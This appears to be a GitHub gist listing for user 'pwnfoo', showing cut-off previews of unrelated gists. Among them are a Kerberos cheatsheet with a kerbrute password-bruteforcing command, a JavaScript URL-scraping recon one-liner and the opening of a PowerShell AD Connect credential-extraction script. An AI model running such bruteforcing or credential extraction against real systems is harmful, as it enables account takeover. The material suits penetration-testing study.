pwnfoo

Keybase proof

I hereby claim:

• I am pwnfoo on github.
• I am pwn_foo (https://keybase.io/pwn_foo) on keybase.
• I have a public key ASCXi5BiiGlfwZ4alOo0TmdeM8TVAm2ypKd4kOogbmJA6go

To claim this, I am signing this object:

pwnfoo

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

pwnfoo

curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu

# debug mode and absolute/relative urls support (the best one):
function ejs() {
   URL=$1;
   curl -Lks $URL | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"'##### %\";curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"('#####.*)|(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\" | sort -fu" | tr -d

pwnfoo

.0
.1
.2
.3
.tar
.tgz
.zip
.tar.gz
.rar
.cache

pwnfoo

Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
Write-Host "`t[ Updated to support new cryptokey storage method ]`n"

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"

try {
    $client.Open()
} catch {
    Write-Host "[!] Could not connect to localdb..."
    return

pwnfoo

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJsPb490n5iP7XcwlLxYs6H6tavHour6xFwGa5kaOd5mNOkXLh8w/uSbJlzeSo7UeqTY/o7a+vxklwT/8xQ8woXnt3iRepvhWcZiBmazKLIljAPzstja6T4lUvdcbLJpzQB0UJQewmb4twzuPi8UpwDtGHCZyWBNePEczV/9YSUggtk1TRGz/Yd3x15t1212hd90Pwjz523NDpWOocGxJTnbyFBC5nLky4RPC88cy3z8Dr7CJEYKxtXit5pQsDxWoeTIoagmhwiWPM98ZCGBe0BWiegCPXL4C47u9hJRpRx08MDCbc6RM9yHpZZRG6SOFNq/EijhUxwYgUmEHEfYtL skamath@pwnbox

pwnfoo

Google Summer of Code 2017

Fedora Project - Welcome Kit

Inspired by the Welcome kit created by Remy DeCauseMaker (decause) which can be found here. Contains content from the original post.

Welcome

pwnfoo

------------------
Average Number of Problems Solved per Team (eligible, scoring): 4.036 +/- 3.824
Median Number of Problems Solved per Team (eligible, scoring): 3.000
------------------
Average Number of Problems Solved per User (eligible, user scoring): 3.318 +/- 3.084
Median Number of Problems Solved per User (eligible, user scoring): 2.000
------------------
Team participation averages:
	Team size: 0	0.000 submitted a correct answer	0.000 submitted some answer
	Team size: 1	0.670 submitted a correct answer	0.617 submitted some answer

pwnfoo

Signs up a user and returns initial details, including the Anokha ID.

Make sure you save the Anokha ID as you might be needing it later.

• Type: POST
• Authorization Required : NO
• Authorization Level : -NA-
• Arguments required:
  • firstName - (1-50 characters long)
  • lastName - (1-50 characters long)

• gender - enum('Male', 'Female')

pwnfoo

collegeList = ["A. D. Patel Institute of Technology",
        "A.K.G. Engineering College",
        "A.R.J. College of Engineering and Technology",
        "ABES Engineering College",
        "ACE Engineering College",
        "AES American Embassy School",
        "AIMIT",
        "AIT",
        "AMC Engineering College",
        "APS College of Engineering",